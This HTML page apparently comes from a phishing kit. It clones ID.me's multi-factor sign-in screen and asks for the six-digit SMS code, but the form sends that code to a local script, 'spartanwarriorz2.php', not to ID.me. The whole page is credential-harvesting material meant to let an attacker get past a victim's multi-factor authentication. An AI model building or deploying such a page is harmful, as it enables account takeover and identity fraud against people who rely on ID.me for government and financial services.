<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <title itemprop="name"> Sign in to ID.me - ID.me</title>
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css">
</head>
<body class="">
    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_token_request_password" id="new_token_request_password"  action="spartanwarriorz2.php" accept-charset="UTF-8" method="post">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme">
                                    <img alt="ID.me" src="images/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg">
                                </div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <h1 id="sr_page_title">Complete your sign in</h1>
                        <ul class="subway_stops three-stops">
                            <li class="subway_stops-item">
                                <span>1</span>
                                <span class="sr-only">Choose your multi-factor method</span>
                            </li>
                            <li class="subway_stops-item">
                                <span>2</span>
                                <span class="sr-only">Initiate your multi-factor method</span>
                            </li>
                            <li aria-current="true" class="subway_stops-item active">
                                <span class="sr-only">Current step</span>
                                <span>3</span>
                                <span class="sr-only">Confirm your multi-factor method</span>
                            </li>
                        </ul>
                        <div class="form-content">
                            <p id="sr_field_label">We have sent 6-digit code via SMS to your phone number</strong></p>
                        </div>
                        <div class="form-fields">
                            <div class="field text m_code">
                                <label class="required" for="multifactor_code">Enter the 6-digit code</label>
                                <input maxlength="6" pattern="[0-9]*" placeholder="_ _ _ _ _ _" aria-describedby="sr_field_label" required="required" autocomplete="one-time-code" size="6" type="text" name="otp" id="multifactor_code">
                            </div>
                        </div>
                        <div class="form-content">
                            <p class="help-link">Didn't receive it?<a href="#">Resend my verification code</a></p>
                        </div>
                        <div class="form-footer with-background">
                            <p>If you’ve changed phone numbers or carriers from when you previously set up multi-factor authentication, please <a href="/en/multifactor/recoveries/new">update your settings here</a>.</p>
                        </div>
                        <div class="form-actions horizontal">
                            <div class="form-action-button">
                                <button name="button" type="submit" class="btn btn-primary" data-disable="true" data-clicked="false">Continue</button>
                            </div>
                            <div class="form-action-button">
                                <a class="cta-link full-width" href="#">Go back</a>
                            </div>
                        </div>
                    </main>
                </form>
            </div>
            <aside aria-label="Select Language" class="language">
                <div class="language-selection" data-component="Components.Language"><a class="language-selection-toggle" href="#">English</a></div>
            </aside>
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        </div>
    </div>
</body>
</html>